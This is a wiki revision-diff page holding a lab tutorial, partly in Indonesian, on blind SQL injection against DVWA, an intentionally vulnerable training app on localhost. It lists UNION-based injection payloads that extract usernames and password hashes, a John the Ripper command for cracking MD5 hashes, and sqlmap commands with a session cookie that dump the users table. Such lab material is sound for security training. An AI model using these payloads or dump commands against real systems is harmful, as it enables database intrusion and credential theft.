Difference between revisions of "DVWA: SQLi blind"

From OnnoWiki
Jump to navigation Jump to search
Line 6: Line 6:
 
  Password : Password
 
  Password : Password
  
3.Select SQL Injection BLIND and  column ID issued 1' and 1=1#
+
3.Select SQL Injection BLIND and  column ID issued
  
 +
1' and 1=1#
 
  1' and 1=1 order by 2 #
 
  1' and 1=1 order by 2 #
  
Line 17: Line 18:
  
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 
  1' and 1=0 union select null,table_name from information_schema.tables#
 
+
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
6..1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'' #
 
  
 
7. Information table name from table user
 
7. Information table name from table user
Line 48: Line 48:
 
than show
 
than show
  
we have an error and my conclusion that this is sql injection, not blind.
+
Lakukan di terminal,
 
 
3. copy url and open your console
 
 
 
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
 
 
 
 
 
 
 
  
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
we get this information by tamer data ini browser's tools
+
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
  
4. Now Looking for Database tables
+
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
+
di peroleh dari addon tamer di browser.
  
 +
lihat tables
  
5. netx search User's Table
+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
 +
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
  
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
+
lihat kolom di user tabel
  
  
6. Look at field password.. we will dump it
+
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;  
 
+
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
 
 
 
 
 
OK GOOD LUCK
 
  
 +
lihat field password & dump
  
 +
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
 +
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump
  
  

Revision as of 07:42, 4 March 2017

DVWA-BLIND SQL INJECTION : LOW Level

1. Open Local host http://localhost/dvwa 

Username :  Admin
Password : Password

3.Select SQL Injection BLIND and column ID issued 

1' and 1=1#
1' and 1=1 order by 2 #

5.ID: 'or' 1=1--

we can see there are 5 user

5. now see information table 

1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #

7. Information table name from table user 

1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #

8. on the last lets see user name and password 

1' and 1=0 union select null,concat(first_name,0x0a,password) from users #

9. we will crack the md5 password 

copy the passowrd into kwrite and save with name hash
next



root@bt:/pentest/passwords/john#./john --format=raw-md5 hash


OK GOOD LUCK

Ok next lesson .. I will explain How to Exploit DVWA using Sqlmap.

1. afer login in DVWA and choose DVWA Securty Low 2. follow this picture 

In User ID write '1

than show

Lakukan di terminal, 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="

di peroleh dari addon tamer di browser.

lihat tables 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables

lihat kolom di user tabel 


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; 
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns

lihat field password & dump 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; 
PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump


Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=DVWA:_SQLi_blind&oldid=47175"